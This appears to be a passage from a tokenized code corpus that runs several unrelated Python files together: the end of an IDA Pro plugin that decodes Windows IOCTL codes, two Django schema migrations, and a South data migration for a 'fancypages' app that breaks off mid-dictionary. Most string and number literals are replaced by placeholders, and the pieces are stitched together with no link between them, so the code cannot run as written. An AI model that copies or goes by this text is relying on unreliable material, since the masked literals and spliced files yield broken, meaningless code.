, <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> device_names2 = [ <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:code>' : <NUM_LIT> } , <EOL> ] <EOL> device = ( ioctl_code >> 
<NUM_LIT:16> ) & <NUM_LIT> <EOL> access = ( ioctl_code >> <NUM_LIT> ) & <NUM_LIT:3> <EOL> function = ( ioctl_code >> <NUM_LIT:2> ) & <NUM_LIT> <EOL> method = ioctl_code & <NUM_LIT:3> <EOL> if device >= len ( device_names ) : <EOL> device_name = device_name_unknown <EOL> for dev in device_names2 : <EOL> if device == dev [ '<STR_LIT:code>' ] : <EOL> device_name = dev [ '<STR_LIT:name>' ] <EOL> break <EOL> else : <EOL> device_name = device_names [ device ] <EOL> print '<STR_LIT>' % ( ioctl_code ) <EOL> print '<STR_LIT>' % ( device_name , device ) <EOL> print '<STR_LIT>' % ( function ) <EOL> print '<STR_LIT>' % ( method_names [ method ] , method ) <EOL> print '<STR_LIT>' % ( access_names [ access ] , access ) <EOL> return <EOL> class WinIoCtlPlugin ( idaapi . plugin_t ) : <EOL> """<STR_LIT>""" <EOL> flags = idaapi . PLUGIN_UNL <EOL> comment = ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> help = '<STR_LIT>' <EOL> wanted_name = '<STR_LIT>' <EOL> wanted_hotkey = '<STR_LIT>' <EOL> def init ( self ) : <EOL> return idaapi . PLUGIN_OK <EOL> def run ( self , _ = <NUM_LIT:0> ) : <EOL> if idc . GetOpType ( idc . ScreenEA ( ) , <NUM_LIT:1> ) != <NUM_LIT:5> : <EOL> return <EOL> value = idc . GetOperandValue ( idc . ScreenEA ( ) , <NUM_LIT:1> ) & <NUM_LIT> <EOL> winio_decode ( value ) <EOL> def term ( self ) : <EOL> pass <EOL> def PLUGIN_ENTRY ( ) : <EOL> return WinIoCtlPlugin ( ) <EOL> def main ( ) : <EOL> if len ( sys . argv ) != <NUM_LIT:2> : <EOL> return <EOL> winio_decode ( int ( sys . argv [ <NUM_LIT:1> ] , <NUM_LIT:16> ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
from __future__ import unicode_literals
from django.db import models, migrations


class Migration(migrations.Migration):
    # Auto-generated schema migration: creates three models, each keyed by a
    # OneToOneField onto an existing model (multi-table-inheritance style
    # ``bases``); the first and third also carry a nullable ForeignKey.

    dependencies = [
        ('<STR_LIT>', '<STR_LIT>'),
        ('<STR_LIT>', '<STR_LIT>'),
        ('<STR_LIT>', '<STR_LIT>'),
    ]

    operations = [
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT>', models.OneToOneField(auto_created=True, primary_key=True, to_field='<STR_LIT:id>', serialize=False, to='<STR_LIT>')),
                ('<STR_LIT>', models.ForeignKey(verbose_name='<STR_LIT>', to_field='<STR_LIT:id>', to='<STR_LIT>', null=True)),
            ],
            options={
                '<STR_LIT>': False,
            },
            bases=('<STR_LIT>',),
        ),
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT>', models.OneToOneField(auto_created=True, primary_key=True, to_field='<STR_LIT:id>', serialize=False, to='<STR_LIT>')),
            ],
            options={
                '<STR_LIT>': False,
            },
            bases=('<STR_LIT>',),
        ),
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT>', models.OneToOneField(auto_created=True, primary_key=True, to_field='<STR_LIT:id>', serialize=False, to='<STR_LIT>')),
                ('<STR_LIT>', models.ForeignKey(verbose_name='<STR_LIT>', to_field='<STR_LIT:id>', to='<STR_LIT>', null=True)),
            ],
            options={
                '<STR_LIT>': False,
            },
            bases=('<STR_LIT>',),
        ),
    ]
from __future__ import unicode_literals
from django.db import models, migrations


class Migration(migrations.Migration):
    # Auto-generated schema migration: creates one model inheriting from an
    # existing one via a parent-link OneToOneField (multi-table inheritance).

    dependencies = [
        ('<STR_LIT>', '<STR_LIT>'),
    ]

    operations = [
        migrations.CreateModel(
            name='<STR_LIT>',
            fields=[
                ('<STR_LIT>', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='<STR_LIT>')),
            ],
            options={
            },
            bases=('<STR_LIT>',),
        ),
    ]
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> from fancypages . utils import FP_NODE_MODEL , FP_PAGE_MODEL <EOL> from fancypages . compat import AUTH_USER_MODEL , AUTH_USER_MODEL_NAME <EOL> class Migration ( DataMigration ) : <EOL> def forwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> if FP_NODE_MODEL == '<STR_LIT>' and FP_PAGE_MODEL == '<STR_LIT>' : <EOL> for page in orm . FancyPage . objects . all ( ) : <EOL> node , __ = orm . PageNode . objects . get_or_create ( <EOL> depth = page . depth , description = page . description , <EOL> image = page . image , name = page . name , numchild = page . numchild , <EOL> path = page . path , slug = page . slug ) <EOL> page . node = node <EOL> page . save ( ) <EOL> def backwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> if FP_NODE_MODEL == '<STR_LIT>' and FP_PAGE_MODEL == '<STR_LIT>' : <EOL> for node in orm . PageNode . objects . all ( ) : <EOL> node . page . depth = node . depth <EOL> node . page . description = node . description <EOL> node . page . image = node . image <EOL> node . page . name = node . name <EOL> node . page . numchild = node . numchild <EOL> node . page . path = node . path <EOL> node . page . slug = node . slug <EOL> node . page . save ( ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" . 
format ( AUTH_USER_MODEL ) } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:width>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> AUTH_USER_MODEL : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : AUTH_USER_MODEL_NAME } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { 
'<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , 
'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , 
[ ] , { } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" . format ( FP_NODE_MODEL ) } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:path>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:status>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' 
, '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:text>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , 
'<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:2>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> FP_NODE_MODEL : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : FP_NODE_MODEL . 
split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:image>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT:path>' : ( '<STR_LIT>' , [ 